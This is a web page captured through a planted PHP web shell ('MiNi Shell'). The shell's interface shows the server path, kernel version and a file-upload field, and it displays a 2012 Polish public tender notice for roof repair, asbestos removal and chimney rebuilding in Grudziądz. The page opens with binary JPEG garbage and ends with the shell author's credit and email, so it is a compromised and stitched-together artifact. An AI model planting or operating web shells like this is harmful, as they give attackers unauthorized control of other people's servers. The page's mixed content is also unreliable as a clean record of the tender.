JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120423/129346-N-2012.html

<p class="kh_header"><b>Grudziądz: Remont dachu z pokryciem dachówką ceramiczną karpiówką, wymiana pokrycia dachu z płyt azbestowo - cementowych na pokrycie dachówką bitumiczną, remont kominów w budynku mieszkalnym wielorodzinnym przy ul. Legionów 17, 17a w Grudziądzu.</b><br>
<b>Numer ogłoszenia: 129346 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o. w Grudziądzu , ul. Mickiewicza 23, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4512034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu z pokryciem dachówką ceramiczną karpiówką, wymiana pokrycia dachu z płyt azbestowo - cementowych na pokrycie dachówką bitumiczną, remont kominów w budynku mieszkalnym wielorodzinnym przy ul. Legionów 17, 17a w Grudziądzu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie roboty budowlanej  polegającej na wykonaniu Remontu dachu z pokryciem dachówką ceramiczną karpiówką, wymiana pokrycia dachu z płyt azbestowo - cementowych na pokrycie dachówką bitumiczną, remont kominów w budynku mieszkalnym wielorodzinnym przy ul. Legionów 17, 17a w Grudziądzu.   

1)   	Opis stanu istniejącego:
Dach o konstrukcji drewnianej z pokryciem dachówką karpiówką - dach od ul. Legionów z daszkami attyk i lukarn.
Dach o konstrukcji drewnianej z pokryciem płytami azbestowo-cementowymi falistymi.
Dach o konstrukcji drewnianej z pokryciem papą - dwukondygnacyjny budynek, oraz budynek oficyny 17 a - od strony podwórka
Kominy murowane z cegły pełnej, otynkowane.

2)   	Ogólny zakres prac do wykonania: 

1.Remont dachu i kominów - fragment budynku z pokryciem dachówką i płytami azbestowo-cementowymi falistymi

-demontaż dachówki ceramicznej karpiówki i gąsiorów (z wywozem i utylizacją) - dach budynku + daszki lukarn i attyk + ogniomury,
-demontaż pokrycia z papy - założono 3 warstwy (z wywozem i utylizacją) - dach attyki środkowej,
-demontaż pokrycia z płyt azbestowo-cementowych falistych (z wywozem i utylizacją),
-demontaż rynien i rur spustowych z blachy ocynk.(jeden pion od bud. nr 19),
-demontaż obróbek blacharskich z blachy ocynk.,
-rozebranie łat - fragment dachu z pokryciem płytami azbest.-cementowymi,
-wymiana łat i kontrłat (założono 100% pow. dachu) - elementy skorodowane (rozstaw łat pod pokrycie dachówką karpiówką standardowa o wym.38*18cm) dach od ul. Legionów,  
-montaż łat kalenicowych z uchwytami pod gąsiory,
-wykonanie rusztowań przy kominach, oraz przemurowanie kominów, (na odcinku ponad dachem spadzistym  + dwie warstwy poniżej połaci). Nowe kominy wykonać z cegły klinkierowej pełnej klasy 35, kolor ceglasty. Zastosować zaprawę do klinkieru z trasem. Sprawdzić drożność przewodów po przemurowaniu- dołączyć opinie kominiarska. 


UWAGA:
Koszty poniesione z tytułu sprawdzenia drożności przewodów kominowych przed 
i po przemurowaniu ponosi Wykonawca.

-wymiana nakryw kominów, - nowe nakrywy z betonu B15, zbrojenie z prętów śr.6 mm, nakrywy zaimpregnować dwukrotnie emulsja asfaltową,
-wymiana obicia z desek ścianek bocznych lukarn i attyki środkowej na obicie z płyt OSB gr. 2,5 cm,
-ułożenie na krokwiach ekranu z foli dachowej zbrojonej paroprzepuszczalnej 
dach od ulicy pod pokrycie dachówką,
-częściowa wymiana deskowania od strony podwórka (pod pokrycie dachówką bitumiczną) - elementy skorodowane- założono wymianę 10% pow. dachu 
(po zminusowaniu założonej wymiany desek pod okapami).

UWAGA: 
Deski pod okapami jednostronnie strugane oraz impregnowane preparatem 
np. DREWNOCHRON lub równoważny w kolorze ciemny brąz

-zaimpregnowanie preparatem solnym grzybobójczym pozostawionego deskowania,
-dwukrotna impregnacja preparatem j. w. widocznych pod okapami odcinków krokwi,
-ułożenie ekranu z folii dachowej zbrojonej paroprzepuszczalnej - dach od ulicy, 
z daszkami attyk skrajnych i lukarn,
-wykonanie konstrukcji nośnej oraz osadzenie wyłazów dachowych z kołnierzem uszczelniającym typu WGT FAKRO o wy. 45*75 cm z zespoloną szybą hartowaną 4H+10+4H lub równoważnych. Wyłazy o konstrukcji klapowej(skrzydło podnoszone 
do góry), 
-wymiana jednostronnego deskowania z desek profilowanych - ścianki czołowe lukarn,
-wymiana desek czołowych i wiatrowych - lukarny,
-pokrycie dachu dachówką ceramiczną karpiówką podwójnie w koronkę - założono dachówkę karpiówkę segmentowa o wym. 38,0*18,0 cm w ilości 36 szt/m2 uwzględnić zakup i montaż dachówek powierzchniowych wentylacyjnych o pow. wentylacji = 10,0 cm/m2, (ilość dachówek went. = 10szt), mocowanie Dachówek za pomocą wkrętów stalowych kadmowych(założono mocowanie co drugiej dachówki) - dotyczy dachu 
od ulicy z daszkami lukarn i attyk,
-pokrycie dachu na podłożu z desek jedną warstwą papy samoprzylepnej pod pokrycie dachówką bitumiczną oraz jedną warstwą dachówki bitumicznej (kształt dachówki -założono karo, kolor grafitowy) - dotyczy dachu od podwórka, ścianek i daszków lukarn od podwórka, 
-uzupełnienie tynków zewn. cementowych na ogniomurach oraz na ścianach attyk 
(od strony dachu),
-wykonanie spadków pod obróbki blacharskie na ogniomurach,
-wykonanie pokrycia jedna warstwą papy  zgrzewalnej podkładowej modyfikowanej typ PYE PV 200 S4 SBS na włókninie poliestrowej  - dach kopertowy attyki środkowej 
od ulicy,
-wykonanie pokrycia jedna warstwą papy zgrzew. Nawierzchniowej modyfikowanej typ PYE PV 250 S5 na włókninie poliestrowej - dach kopertowy attyki środkowej od ulicy, 
-wykonanie nowych obróbek blacharskich z blachy cynkowo - tytanowej gr.0,6 mm,
-montaż płotków przeciwśniegowych - dach od podwórka,
-montaż ław i stopni kominiarskich - (systemowe stalowe powlekane),
-montaż rynien śr.150 mm z blachy cynkowo - tytanowej gr 0,6mm,
-montaż zbiorniczków przy rynnach - od ulicy,
-montaż rur spustowych śr.120 mm z blachy cynkowo -tytanowej gr. 0,6 mm 
( kpl. pionów od podwórka, jeden pion od ulicy),
-uzupełnienie brakującego elementu dekoracyjnego- szpicy betonowej zwieńczającej ścianę attyki skrajnej lewej, wzór zgodny z istniejącą szpicą attyki skrajnej prawej 
- od ulicy Legionów,
-wykonanie, montaż i rozebranie rynien,
-wykonanie zastaw zabezpieczających na dachu,
-wykonanie daszków zabezpieczających nad wejściami - na okres remontu,
-rusztowanie rurowe zewnętrzne,

UWAGA:
Koszty poniesione z tytułu zajęcia pasa chodnika oraz wykonania projektu pokrywa  Wykonawca - wywóz i utylizacja gruzu z rozbiórki

2.	Remont dachu z pokryciem papą - budynek przylegający do lewego skrzydła budynku od podwórka oraz oficyna nr 17 a - budynek przylegający do prawego skrzydła
-rozebranie rynien i rur spustowych oraz obróbek blacharskich z blachy ocynkowanej,
-rozebranie pokrycia z papy na podłożu drewnianym (z wywozem i utylizacją) - założono 3 warstwy,
-wymiana desek pod okapami - deski jednostronnie strugane z zaimpregnowaniem preparatem olejowym w kolorze ciemny brąz (zaimpregnować również widoczne odcinki krokwi),
-wymiana deskowania z desek na styk - założono 20 % pow. dachu,
-dwukrotna impregnacja desek preparatami solnymi grzybobójczymi 
- pozostawione istniejące deskowanie dachu,
-spadki pod obróbki blacharskie na ogniomurach,
-rozebranie nakryw kominów,
-przemurowanie kominów z cegły pełnej (na odcinku ponad dachem + dwie warstwy, poniżej połaci), wykonanie tynku zewn. cem. -wap. kat. III,

UWAGA:
Koszty poniesione z tytułu sprawdzenia drożności przewodów kominowych pokrywa Wykonawca (dostarczyć opinię kominiarską):

-wykonanie nowych nakryw zbrojonych prętami fi 6 mm,
-izolacja pozioma nakryw emulsją asfaltową * 2 krotnie,
-wykonanie nowych obróbek blacharskich z blachy cynkowo-tytanowej gr. 0,6 mm,
-dwuwarstwowe pokrycie dachu papą termozgrzewalną - pierwsza warstwa 
z papy podkładowej modyfikowanej typu PYE PV 200 S4 SBS na włókninie poliestrowej, druga warstwa z papy nawierzchniowej modyfikowanej typu PYE PV 250 S5 na włókninie poliestrowej,
-obróbki kominów i ścian budynków przylegających z papy termozgrzewalnej nawierzchniowej (typ papy jak wyżej),
-montaż  rynien śr. 15 cm. i rur spustowych śr. 12 cm z blachy cynk.- tytan.gr. 0,6 mm,
-wywóz i utylizacja gruzu z rozbiórki kominów,
-rusztowanie ramowe warszawskie jednokolumnowe - wymiana rur spustowych + remont pod okapami,
-wykonanie daszków zabezpieczających nad wejściami - na okres remontu,

3.Wymiana stolarki okiennej drewnianej na pcv - lokal mieszkalny p. Wiśniewska - pom. kuchni i pokój
-wymiana okna skrzynkowego drewnianego (pom. kuchni) o wym. 1,35*2,30m dwudzielnego, czteroskrzydłowego z poziomym ramiakiem oraz słupkiem na stałe, okno pcv wykonać w kolorze białym (profil 5-cio komorowy, szyby o wsp. U = 1,1 W/m2K) jako dwudzielne, czteroskrzydłowe z ramiakiem poziomym na stałe (ramiak na 2/3 wysokości okna), jedno skrzydło jako uchylno-rozwierane, pozostałe rozwierane,
-wymiana okna skrzynkowego, drewnianego (pokój) o wym. 2,60*2,30 m. trójdzielnego, sześcioskrzydłowego, z poziomym ramiakiem oraz dwoma słupkami na stałe, okno pcv wykonać w kolorze białym (profil 5-cio komorowy, szyby o wsp. U = 1,1 W/m2K) jako dwudzielne czteroskrzydłowe  z ramiakiem poziomym na stałe (ramiak na 2/3 wysokości okna), jedno skrzydło jako uchylno-rozwierane pozostałe rozwierane,
-uzupełnienie tynków od strony zewn. i wewn. na ościeżach, oraz pomalowanie farbami emulsyjnymi od wewnątrz,
-wymiana obróbek podokienników zewnętrznych z blachy cynkowo-tytanowej gr, 0,6 mm.

Szczegółowy zakres przedmiotu zamówienia określa przedmiar robót, na bazie którego należy opracować kosztorys ofertowy metodą szczegółową, który należy załączyć do oferty. 

UWAGA: 
Rozbiórkę pokrycia dachu należy wykonać poprzez wyspecjalizowaną i  przeszkoloną brygadę zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest

Utylizację płyt azbestowych należy  przeprowadzić w wyspecjalizowanym  zakładzie i uzyskać stosowne zaświadczenie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.26.10.00-4, 45.45.30.00-7, 90.65.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w   wysokości:  5 000,00 zł

Słownie:  pięć tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona  na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert,  3 robót budowlanych w zakresie naprawy  pokrycia dachowego z dachówki na kwotę nie mniejszą niż 50 000,00 zł brutto każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim  potencjałem technicznym Zamawiający nie stawia wymogów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonywania zamówienia Zamawiający uzna dysponowanie osobami posiadającymi:

-uprawnienia budowlane w zakresie kierowania i nadzorowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
-dysponowanie pracownikami przeszkolonymi w zakresie bezpieczeństwa użytkowania wyrobów posiadających azbest (minimum 1 osoba),
-kwalifikacje w zawodzie dekarz (minimum 2 osoby).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie opłaconej polisy, potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 100 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mpgn.grudziadz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodraki Nieruchomościami Sp. z o.o., ul. Mickiewicza 23, 86-300 Grudziądz, Wejście Nr 1, pokój nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodraki Nieruchomościami Sp. z o.o., ul. Mickiewicza 23, 86-300 Grudziądz, Wejście Nr 1 - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com